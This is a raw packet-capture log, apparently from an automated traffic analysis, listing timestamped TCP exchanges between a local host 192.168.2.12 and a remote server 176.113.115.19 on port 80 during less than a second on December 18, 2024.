                                                                    Dec 18, 2024 20:55:41.423741102 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.426326990 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.426405907 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.426696062 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.426747084 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.428936958 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.428944111 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.429049015 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.432220936 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.432279110 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.432638884 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.432732105 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.435600996 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.435655117 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.436374903 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.436424017 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.438275099 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.438282013 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.438328028 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.441030979 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.441039085 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.441088915 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.443365097 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.443439007 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.444117069 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.444180012 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.446772099 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.446840048 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.446846962 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.446882010 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.449390888 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.449431896 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.450010061 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.450067997 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.451432943 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.451483965 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.452213049 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.452284098 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.454673052 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.454678059 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.454720020 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.457108021 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.457163095 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.457900047 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.457947969 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.460340023 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.460347891 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.460397959 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.462790012 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.462846994 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.463582039 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.463727951 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.465214014 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.465255976 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.466011047 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.466062069 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.468498945 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.468511105 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.468560934 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.470876932 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.470884085 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.470890999 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.470951080 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.470967054 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.471735001 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.471746922 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.471803904 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.472537994 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.472544909 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.472593069 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.473386049 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.473393917 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.473448992 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.474150896 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.474215031 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.474562883 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.474630117 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.474725962 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.474776983 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.476336002 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.476397991 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.476459980 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.476531982 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.478280067 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.478326082 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.478771925 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.478844881 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.479996920 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.480051041 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.480604887 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.480654955 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.481786013 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.481839895 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.482399940 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.482448101 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.483423948 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.483481884 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.483620882 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.483688116 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.485313892 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.485407114 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.485601902 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.485662937 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.487019062 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.487075090 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.487443924 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.487505913 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.488734961 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.488792896 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.489192009 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.489262104 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.490564108 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.490660906 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.490904093 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.490978003 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.492520094 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.492583036 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.492911100 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.492974043 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.494061947 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.494121075 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.604409933 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.604543924 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.604707003 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.604855061 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.604901075 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.605098963 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.605148077 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.605726004 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.605773926 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.605910063 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.605952978 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.607311010 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.607367039 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.607517004 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.607568979 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.609077930 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.609191895 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.609333992 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.609385014 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.610663891 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.610718966 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.610841990 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.610892057 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.613466024 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.613538027 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.614124060 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.614187002 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.617284060 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.617299080 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.617345095 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.617357969 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.618000031 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.618012905 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.618053913 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.620116949 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.620130062 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.620167017 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.620191097 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.621223927 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.621284008 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.622045994 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.622102022 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.622647047 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.622694969 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.623095989 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.623145103 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.624463081 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.624483109 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.624515057 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.624526978 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.627645969 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.627717018 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.628473997 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.628524065 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.629240036 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.629254103 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.629287004 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.629298925 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.631584883 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.631597996 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.631635904 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.631715059 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.634021044 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.634047985 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.634079933 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.634094954 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.636549950 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.636563063 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.636630058 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.638035059 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.638086081 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.639062881 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.639116049 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.640008926 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.640058041 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.640744925 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.640798092 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.642849922 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.642904043 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.643614054 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.643666983 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.645170927 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.645275116 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.645970106 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.646018028 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.646832943 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.646846056 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.646884918 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.649256945 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.649270058 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.649312019 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.650001049 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.650051117 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.650808096 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.650859118 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.652581930 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.652630091 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.653184891 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.653244019 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.655580997 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.655628920 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.656410933 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.656461954 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.657186031 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.657227039 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.658065081 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.658123016 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.659563065 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.659578085 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.659611940 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.659631014 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.662018061 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.662029982 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.662070990 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.662833929 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.662879944 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.663578987 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.663629055 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.665203094 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.665251017 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.665965080 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.666014910 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.667532921 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.667553902 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.667586088 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.667598963 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.669282913 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.669296980 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.669337034 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.670864105 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.670913935 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.671681881 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.671734095 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.672403097 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.672454119 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.673158884 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.673228979 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.674722910 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.674736977 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.674776077 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.676352978 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.676402092 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.677128077 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.677160978 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.677180052 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.677198887 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.677998066 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.678011894 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.678024054 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.678051949 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.678070068 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.678802967 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.678816080 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.678860903 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.679502964 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.679522038 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.679558992 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.679578066 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.680315971 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.680330038 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.680403948 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.681158066 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.681171894 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.681185007 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.681207895 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.681232929 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.681936026 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.681948900 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.681986094 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.682008982 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.682744026 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.682758093 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.682801008 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.683537960 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.683551073 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.683592081 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.683615923 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.684298038 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.684336901 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.684349060 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.684371948 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.685137987 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.685151100 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.685162067 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.685189009 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.685204983 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.685944080 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.685988903 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.685993910 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.686028957 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.686758995 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.686773062 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.686784029 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.686811924 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.686834097 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.796484947 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.796586990 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.796602011 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.796643972 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.796878099 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.796926022 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.797044992 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.797094107 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.798594952 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.798651934 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.798886061 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.798935890 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.800430059 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.800482035 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.800601006 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.800647974 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.801954031 CET8049711176.113.115.19192.168.2.12
